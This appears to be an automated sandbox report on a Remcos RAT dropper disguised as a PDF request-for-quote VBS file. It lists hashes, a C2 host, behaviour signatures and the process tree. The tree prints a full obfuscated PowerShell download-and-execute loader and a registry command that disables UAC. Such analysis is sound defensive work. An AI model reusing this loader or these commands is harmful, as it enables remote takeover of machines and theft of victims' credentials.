Analysis

  • max time kernel
    148s
  • max time network
    162s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-11-2024 09:08

General

  • Target

    Fluor RFQ1475·pdf.vbs

  • Size

    15KB

  • MD5

    695ec6cd0d4d8abaab5bed4e4f37153d

  • SHA1

    027b2b36b69e9f41bc5b54493533d8b417192255

  • SHA256

    3bb02f08d2d70b6f126d045a385a241330dbe96689304c48f1b9a1958297a060

  • SHA512

    36a68f1693a03903990cf86eafe285cacab31b8b89a2a7c033e06545942604d8c735f4ff4d15d33c77e83379d74064954cd12a5fcb1bc3ea2b6cc289ef63ae1c

  • SSDEEP

    384:aCTCJn/NHU8wde1pmZaKHQtL1YNBcYK7CB7qdgcKU:JuJnFH/w6pmmtl5WB7qm8

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

mtt9kw1mj.duckdns.org:23458

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-28YJO8

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • UAC bypass 3 TTPs 1 IoCs
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 13 IoCs
  • Uses browser remote debugging 2 TTPs 9 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 19 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Fluor RFQ1475·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1268
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Estivate Electrochronographic Kldet denationaliseringernes Decanting Sstridskrfters #><#Hundjvel Ubeslutsomstes Skvhovedet Sammenligningerne Indstuderingens #>$Bebyrdelsen='Undervisningsbruget';function Koffardifart($Enqueter100){If ($host.DebuggerEnabled) {$Rhamnal=4} for ($Fichu=$Rhamnal;;$Fichu+=5){if(!$Enqueter100[$Fichu]) { break }$Chaetosomatidae+=$Enqueter100[$Fichu]}$Chaetosomatidae}function Poppied($Platanista147){ .($hjertesorg) ($Platanista147)}$Elskoven=Koffardifart 'Thaun FeoE ,ertD la.UnleWRoboEJenfB.alecBe al GecINskeE ilfnKa at';$Ndtvungne=Koffardifart ' BorMFriso .ekzUd,aiK.ntlNonplmacra Tan/';$firemandswhistens=Koffardifart 'Sca TMyxolJossssu p1Gal 2';$frugtstand='Tera[ PilnBraneRe eT ver.VrinSF,adEInfoRUnmevInc.iOpslcUnaceB,rtp dgao ufiI KjeNPosttSa tmbylda Unvn,deiAPlatGTeleeD cyrCrts]Fejd:Hyme: barS Be EDownCmonsuMonyr Seei scaTAll yKrydpChooRDomiosvvetSka OTydeCPurpoForbLCant=Perf$ BarfIpabI droRvarieOxheMFa.raFrkhN ystdspigSErotwSkulHUnboISeeaSMolrT eucEpaafN tr.s';$Ndtvungne+=Koffardifart 'Poe,5genn.Data0Imp Uncl(UdklWAppriE hvnFrp dGearo pirwOxalsVulk sl.tNFishTMa n Trop1Kim 0S ud.Teos0over;.onp KoreWRepoiFeo nAngl6Pavi4sche; re. No oxSylt6Rvrd4 G.r; and G derTermv la:Mund1 Mar3A ri1Forb.unco0,ret)Trgh BedsGOpvie LemcMiddkDa aoFacs/,jov2Gosc0Reas1Hamp0,sym0Sk b1 Act0Subs1 Ich I faFA riiNon rSucce R sfSquuo A hxU.vo/Mass1m,ch3R.bb1Free. Tar0';$Oligoprothetic=Koffardifart 'RameU Jo s LifECom RThil- Wala ortgPrineMa.tnmumbt';$Valsede=Koffardifart 'Mangh afrtFl atAktip PedsLin :Mcen/Katu/Pl nd msarJuleiThe,vCirceBur .AmangIrraoUnd oP.otgenerlSkifeFord.MetacDiffo esmKamm/Folku.irtcCru ?App e.krmxKiddpUn,eo m nrAfbitProa= tatd TwioCorpwHortn RumlN rvoFaldaEk odRis &Eye iRevadUdry= .yg1E brgmonsxProb2 He EAssuzH mm0Valgd AnaXKar.C irc3H ndz f rOP.ee3Pels4Clem2Sm t-BlyaR Un x BrakSkinEAitsc al4Gol,d Do,-EcocMOverHDdssYSeptA.schkReim-TrespErhvE';$tttekammen=Koffardifart 'Hibe>';$hjertesorg=Koffardifart 'OveriNat,e Immx';$Redirigeringers='Risskov';$Tilbagekaldelsesordningen='\Houting.Gha';Poppied (Koffardifart ' id$Be tg P.pLS,bsoKor.bBlaaATenelProd: .nfS,anct,oolORettFDegeMsoapN RenGForeDSpeceFastsComm=R ta$NarceSaddNPrisVfrdi:E,hia Pr P TycPEskoD PatAReditKursAVan,+ Aha$ sk tSk biSu sl SkrbApana mrG naeDa.sk uraFi sLLaveDNeurECanclSkotS ondEBa dSPar OdeteRVegeDAcann ModI.aminHalfg TaoeNo mN');Poppied (Koffardifart ' sse$AlpeG Sk LLnenOAn mBOposa HonLLn t:PencodefiVSammeG,eaRSupebAyelYErhvGT mbnU exI utNForbGUlve=Obse$wareV Fl a enlEnr S epELuxedCon ERef..TelesGeompMozalUncoiSpejtFetu( Nar$Teo,t weat xtTBij eIdeak Sa aUns MMetoMSte ESkrinSttt)');Poppied (Koffardifart $frugtstand);$Valsede=$overbygning[0];$Brontosaur=(Koffardifart ' Lod$Skr g PolL ungODisaBPhota,joeLKlu :.vanBSte ROverE SunM Ko e feslT rpYSad =MellNZoneeGr.lWTilb-Ko tOFr lbmaskJHypoeNarccPattt Bag nseSbuchy,ubpsKazaTSemiE,cytMUnsp.E bl$StoreLay,lSydsSMar.K OutoPsalVbi.eet.lgn');Poppied ($Brontosaur);Poppied (Koffardifart 'Nive$KrypBRep,r cateTilsmDealeU velAlkyySt m.St,rHPrede O ea entdClaueBootrhac.s Dis[Ro,a$FrisOsa tl freiJe ngD,lioSpndp unerEndaoStettEr.ch S aeCu etWieni OricStal]Unde=Occi$receN rnd memtBeslvT avuS ojnlabig DamnForee');$Rubiginose=Koffardifart 'Triv$Ka mBPa er PaneKommm GrueI del ,ney eur.StraDAlkaoFremwH.linSi pl tao Bygaud,bd derFNontiUautlHaggeSste(Opve$BoolVVildaF sslEnnosP ile,ogodLogae Un.,Af.a$FuliAMahdmDalep CarhN.rdi .hig .quaProfm Disa StreOpa )';$Amphigamae=$Stofmngdes;Poppied (Koffardifart ' Sta$Sun gC deLsounOpauebOsteaKaftL Tan:s,yrbPrveuGamiTPhenIMaskkBezaSUbefSAmniT MonrGe tUVenikRecuTPlanUSpinRNo.b=Indl(Abnot ette ResSWl dt Kat- ConPBakkaLayeTTam HOps Rddi$ ArtAkonomH reP SkuH rdeIA,tigSupeAazalMHoglAGauceTrkk)');while (!$Butiksstruktur) {Poppied (Koffardifart 'Kall$ izzgt wblIndsoBi dbIndta DomlDobb:SlumS,mtalbackaOpstgFutut SpeeNivekMetrvAcutgUnca=G,ft$PleaMBefoyArguoPapinUncueMakauBasers mioDisomPalaa') ;Poppied $Rubiginose;Poppied (Koffardifart 'Trsts,kdetBayoASludr PartOutw-DiffsTot L BaleHemoe,krip B o Stor4');Poppied (Koffardifart ' Ind$ KobGDennLdesuocompBShoca Krol Un.:T rrbTreauTricT G.nIAer k ,yoSM lisDe at palrCrosuBaankunlotDisrUGarvr Tr =Slip( PretOvereAmniSas etSkri-U biPMenuaEkspTSerbHur t Aut$ AkkANomeMGuttpRetuhAdamiCompgvatiA mpaMAteiaEtouEAneu)') ;Poppied (Koffardifart 'Nemo$OvergKautLStroO LanB enta eziL Cha:G spSIndePRanuIarveRReariVisstRefoe Ki d UdflfljtyRask=Quat$AuragEquiLO riO LvsbBesyA cholPest:Ta gP SelIF emLH,rmT Para Na SSloyTTakte ukaRUndeS Ech+Afid+ Thu%Lok $SammO revOficEAislRSculBOmvey ForG RhaNA.toIUnocNHorsgse,v.AumeC Hi oAnt U asyNLe pT') ;$Valsede=$overbygning[$Spiritedly]}$Adventistens=301189;$Abetment=30028;Poppied (Koffardifart 'Omba$ Klag BruL fesobumbB Hyracar.L N n:Arr KSalvnFlytkByggBpresRAutod Ta eMollN.kolE Kr ept=Ekst Sli,GHel.E nteTToym-In,ocHemooK rlnConst irceVveiN omaTSur dea$Aft AIndlMHn ePfrimh mbriBotoG Co.A DaaMFly aPeasE');Poppied (Koffardifart 'Rr r$DogsgCy.llKr eoBranbPa.ma anlStap:MaryH UbeoemblfRandjFemog irae .aarBrndmKanaeTillsBatttExcerNedneEnvinAkseeBe a Foo= tje For[,sonSOlanyLudbs rictH skeg ycm For.PeebCBeslo S mnMatevR,toe SkurTegnt,ene] lar:Hjer: GniFReforAggeoDivimO,hrBBillaDe esTo veSila6Scle4FestSkejst linrI,pei IntnMu tgSt l( Unr$SwigKKrosnNo.skCatabR skr WhidTe re DivnRivee Gen)');Poppied (Koffardifart 'Tec $tolvgEnjelUpdroIntubWeatAS lll Un,: SabeFriglPr dV KeraEnnuN DagiWheet RreIPresCEven Eme=Orib Micr[ entSSav YdjvlSGregTFuldeThe MAgno.Te et LaneProcXCigaT Ph .Tetae MisnNsebCMe aofor DAnt.IskrmNRumfGNon ]Reng: Bam:.nphAP.roS Fa cAfteidiphi Sik. GolgPrene fr TRadiS ermTBdeprElitIKomfnSaksGBer ( us$Opp.h onsoRoguFBetwJS,orGBundeAfteRSl gm CuleKlipsbillT,terr SkaEBluenforme t i)');Poppied (Koffardifart 'B id$Va.aG BegLStilOPropB,uria DanLMagi:Lo sz illYstorgAfgaOUdfrdOejeaMortcSwirtunamY FleLTubii Res=U se$,rade arelUndev.redaHas.NFolkIEuorT kroiSpikCKvar.Pr.aSGeleu tomb ofeS ,poTJonsr ulI H pn yldGRo,b(Cyma$Mae ASandd,usaVgushEMellN aaht Enci TokS peT,oleE yggn Su s Bed,koda$ ,umAUnwhbcente Bilt .nbmAmirEDiskNSym THasp)');Poppied $zygodactyli;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1048
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Estivate Electrochronographic Kldet denationaliseringernes Decanting Sstridskrfters #><#Hundjvel Ubeslutsomstes Skvhovedet Sammenligningerne Indstuderingens #>$Bebyrdelsen='Undervisningsbruget';function Koffardifart($Enqueter100){If ($host.DebuggerEnabled) {$Rhamnal=4} for ($Fichu=$Rhamnal;;$Fichu+=5){if(!$Enqueter100[$Fichu]) { break }$Chaetosomatidae+=$Enqueter100[$Fichu]}$Chaetosomatidae}function Poppied($Platanista147){ .($hjertesorg) ($Platanista147)}$Elskoven=Koffardifart 'Thaun FeoE ,ertD la.UnleWRoboEJenfB.alecBe al GecINskeE ilfnKa at';$Ndtvungne=Koffardifart ' BorMFriso .ekzUd,aiK.ntlNonplmacra Tan/';$firemandswhistens=Koffardifart 'Sca TMyxolJossssu p1Gal 2';$frugtstand='Tera[ PilnBraneRe eT ver.VrinSF,adEInfoRUnmevInc.iOpslcUnaceB,rtp dgao ufiI KjeNPosttSa tmbylda Unvn,deiAPlatGTeleeD cyrCrts]Fejd:Hyme: barS Be EDownCmonsuMonyr Seei scaTAll yKrydpChooRDomiosvvetSka OTydeCPurpoForbLCant=Perf$ BarfIpabI droRvarieOxheMFa.raFrkhN ystdspigSErotwSkulHUnboISeeaSMolrT eucEpaafN tr.s';$Ndtvungne+=Koffardifart 'Poe,5genn.Data0Imp Uncl(UdklWAppriE hvnFrp dGearo pirwOxalsVulk sl.tNFishTMa n Trop1Kim 0S ud.Teos0over;.onp KoreWRepoiFeo nAngl6Pavi4sche; re. No oxSylt6Rvrd4 G.r; and G derTermv la:Mund1 Mar3A ri1Forb.unco0,ret)Trgh BedsGOpvie LemcMiddkDa aoFacs/,jov2Gosc0Reas1Hamp0,sym0Sk b1 Act0Subs1 Ich I faFA riiNon rSucce R sfSquuo A hxU.vo/Mass1m,ch3R.bb1Free. Tar0';$Oligoprothetic=Koffardifart 'RameU Jo s LifECom RThil- Wala ortgPrineMa.tnmumbt';$Valsede=Koffardifart 'Mangh afrtFl atAktip PedsLin :Mcen/Katu/Pl nd msarJuleiThe,vCirceBur .AmangIrraoUnd oP.otgenerlSkifeFord.MetacDiffo esmKamm/Folku.irtcCru ?App e.krmxKiddpUn,eo m nrAfbitProa= tatd TwioCorpwHortn RumlN rvoFaldaEk odRis &Eye iRevadUdry= .yg1E brgmonsxProb2 He EAssuzH mm0Valgd AnaXKar.C irc3H ndz f rOP.ee3Pels4Clem2Sm t-BlyaR Un x BrakSkinEAitsc al4Gol,d Do,-EcocMOverHDdssYSeptA.schkReim-TrespErhvE';$tttekammen=Koffardifart 'Hibe>';$hjertesorg=Koffardifart 'OveriNat,e Immx';$Redirigeringers='Risskov';$Tilbagekaldelsesordningen='\Houting.Gha';Poppied (Koffardifart ' id$Be tg P.pLS,bsoKor.bBlaaATenelProd: .nfS,anct,oolORettFDegeMsoapN RenGForeDSpeceFastsComm=R ta$NarceSaddNPrisVfrdi:E,hia Pr P TycPEskoD PatAReditKursAVan,+ Aha$ sk tSk biSu sl SkrbApana mrG naeDa.sk uraFi sLLaveDNeurECanclSkotS ondEBa dSPar OdeteRVegeDAcann ModI.aminHalfg TaoeNo mN');Poppied (Koffardifart ' sse$AlpeG Sk LLnenOAn mBOposa HonLLn t:PencodefiVSammeG,eaRSupebAyelYErhvGT mbnU exI utNForbGUlve=Obse$wareV Fl a enlEnr S epELuxedCon ERef..TelesGeompMozalUncoiSpejtFetu( Nar$Teo,t weat xtTBij eIdeak Sa aUns MMetoMSte ESkrinSttt)');Poppied (Koffardifart $frugtstand);$Valsede=$overbygning[0];$Brontosaur=(Koffardifart ' Lod$Skr g PolL ungODisaBPhota,joeLKlu :.vanBSte ROverE SunM Ko e feslT rpYSad =MellNZoneeGr.lWTilb-Ko tOFr lbmaskJHypoeNarccPattt Bag nseSbuchy,ubpsKazaTSemiE,cytMUnsp.E bl$StoreLay,lSydsSMar.K OutoPsalVbi.eet.lgn');Poppied ($Brontosaur);Poppied (Koffardifart 'Nive$KrypBRep,r cateTilsmDealeU velAlkyySt m.St,rHPrede O ea entdClaueBootrhac.s Dis[Ro,a$FrisOsa tl freiJe ngD,lioSpndp unerEndaoStettEr.ch S aeCu etWieni OricStal]Unde=Occi$receN rnd memtBeslvT avuS ojnlabig DamnForee');$Rubiginose=Koffardifart 'Triv$Ka mBPa er PaneKommm GrueI del ,ney eur.StraDAlkaoFremwH.linSi pl tao Bygaud,bd derFNontiUautlHaggeSste(Opve$BoolVVildaF sslEnnosP ile,ogodLogae Un.,Af.a$FuliAMahdmDalep CarhN.rdi .hig .quaProfm Disa StreOpa )';$Amphigamae=$Stofmngdes;Poppied (Koffardifart ' Sta$Sun gC deLsounOpauebOsteaKaftL Tan:s,yrbPrveuGamiTPhenIMaskkBezaSUbefSAmniT MonrGe tUVenikRecuTPlanUSpinRNo.b=Indl(Abnot ette ResSWl dt Kat- ConPBakkaLayeTTam HOps Rddi$ ArtAkonomH reP SkuH rdeIA,tigSupeAazalMHoglAGauceTrkk)');while (!$Butiksstruktur) {Poppied (Koffardifart 'Kall$ izzgt wblIndsoBi dbIndta DomlDobb:SlumS,mtalbackaOpstgFutut SpeeNivekMetrvAcutgUnca=G,ft$PleaMBefoyArguoPapinUncueMakauBasers mioDisomPalaa') ;Poppied $Rubiginose;Poppied (Koffardifart 'Trsts,kdetBayoASludr PartOutw-DiffsTot L BaleHemoe,krip B o Stor4');Poppied (Koffardifart ' Ind$ KobGDennLdesuocompBShoca Krol Un.:T rrbTreauTricT G.nIAer k ,yoSM lisDe at palrCrosuBaankunlotDisrUGarvr Tr =Slip( PretOvereAmniSas etSkri-U biPMenuaEkspTSerbHur t Aut$ AkkANomeMGuttpRetuhAdamiCompgvatiA mpaMAteiaEtouEAneu)') ;Poppied (Koffardifart 'Nemo$OvergKautLStroO LanB enta eziL Cha:G spSIndePRanuIarveRReariVisstRefoe Ki d UdflfljtyRask=Quat$AuragEquiLO riO LvsbBesyA cholPest:Ta gP SelIF emLH,rmT Para Na SSloyTTakte ukaRUndeS Ech+Afid+ Thu%Lok $SammO revOficEAislRSculBOmvey ForG RhaNA.toIUnocNHorsgse,v.AumeC Hi oAnt U asyNLe pT') ;$Valsede=$overbygning[$Spiritedly]}$Adventistens=301189;$Abetment=30028;Poppied (Koffardifart 'Omba$ Klag BruL fesobumbB Hyracar.L N n:Arr KSalvnFlytkByggBpresRAutod Ta eMollN.kolE Kr ept=Ekst Sli,GHel.E nteTToym-In,ocHemooK rlnConst irceVveiN omaTSur dea$Aft AIndlMHn ePfrimh mbriBotoG Co.A DaaMFly aPeasE');Poppied (Koffardifart 'Rr r$DogsgCy.llKr eoBranbPa.ma anlStap:MaryH UbeoemblfRandjFemog irae .aarBrndmKanaeTillsBatttExcerNedneEnvinAkseeBe a Foo= tje For[,sonSOlanyLudbs rictH skeg ycm For.PeebCBeslo S mnMatevR,toe SkurTegnt,ene] lar:Hjer: GniFReforAggeoDivimO,hrBBillaDe esTo veSila6Scle4FestSkejst linrI,pei IntnMu tgSt l( Unr$SwigKKrosnNo.skCatabR skr WhidTe re DivnRivee Gen)');Poppied (Koffardifart 'Tec $tolvgEnjelUpdroIntubWeatAS lll Un,: SabeFriglPr dV KeraEnnuN DagiWheet RreIPresCEven Eme=Orib Micr[ entSSav YdjvlSGregTFuldeThe MAgno.Te et LaneProcXCigaT Ph .Tetae MisnNsebCMe aofor DAnt.IskrmNRumfGNon ]Reng: Bam:.nphAP.roS Fa cAfteidiphi Sik. GolgPrene fr TRadiS ermTBdeprElitIKomfnSaksGBer ( us$Opp.h onsoRoguFBetwJS,orGBundeAfteRSl gm CuleKlipsbillT,terr SkaEBluenforme t i)');Poppied (Koffardifart 'B id$Va.aG BegLStilOPropB,uria DanLMagi:Lo sz illYstorgAfgaOUdfrdOejeaMortcSwirtunamY FleLTubii Res=U se$,rade arelUndev.redaHas.NFolkIEuorT kroiSpikCKvar.Pr.aSGeleu tomb ofeS ,poTJonsr ulI H pn yldGRo,b(Cyma$Mae ASandd,usaVgushEMellN aaht Enci TokS peT,oleE yggn Su s Bed,koda$ ,umAUnwhbcente Bilt .nbmAmirEDiskNSym THasp)');Poppied $zygodactyli;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:5040
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2620
      • C:\Windows\SysWOW64\cmd.exe
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3696
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • UAC bypass
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:1172
      • C:\Program Files\Google\Chrome\Application\Chrome.exe
        --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
        3⤵
        • Uses browser remote debugging
        • Enumerates system info in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:2380
        • C:\Program Files\Google\Chrome\Application\Chrome.exe
          "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcd483cc40,0x7ffcd483cc4c,0x7ffcd483cc58
          4⤵
            PID:2040
          • C:\Program Files\Google\Chrome\Application\Chrome.exe
            "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1912,i,1210652548765723729,2911505113347473541,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1908 /prefetch:2
            4⤵
              PID:1552
            • C:\Program Files\Google\Chrome\Application\Chrome.exe
              "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2164,i,1210652548765723729,2911505113347473541,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2212 /prefetch:3
              4⤵
                PID:3584
              • C:\Program Files\Google\Chrome\Application\Chrome.exe
                "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2224,i,1210652548765723729,2911505113347473541,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2292 /prefetch:8
                4⤵
                  PID:1828
                • C:\Program Files\Google\Chrome\Application\Chrome.exe
                  "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3160,i,1210652548765723729,2911505113347473541,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3188 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:3608
                • C:\Program Files\Google\Chrome\Application\Chrome.exe
                  "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3180,i,1210652548765723729,2911505113347473541,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3236 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:4044
                • C:\Program Files\Google\Chrome\Application\Chrome.exe
                  "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4600,i,1210652548765723729,2911505113347473541,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4628 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:1032
              • C:\Windows\SysWOW64\msiexec.exe
                C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\mdxzdrasomo"
                3⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:4268
              • C:\Windows\SysWOW64\msiexec.exe
                C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\xfkkejkucugdha"
                3⤵
                • Accesses Microsoft Outlook accounts
                • System Location Discovery: System Language Discovery
                PID:3724
              • C:\Windows\SysWOW64\msiexec.exe
                C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\hzqcecvoqcyqrotekl"
                3⤵
                  PID:3988
                • C:\Windows\SysWOW64\msiexec.exe
                  C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\hzqcecvoqcyqrotekl"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:976
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                  3⤵
                  • Uses browser remote debugging
                  • Enumerates system info in registry
                  • Modifies registry class
                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                  • Suspicious use of FindShellTrayWindow
                  PID:3860
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffcd46f46f8,0x7ffcd46f4708,0x7ffcd46f4718
                    4⤵
                      PID:2228
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,5031013863036374286,9431848645175149783,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2
                      4⤵
                        PID:4032
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,5031013863036374286,9431848645175149783,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3
                        4⤵
                          PID:1376
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,5031013863036374286,9431848645175149783,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2804 /prefetch:8
                          4⤵
                            PID:4760
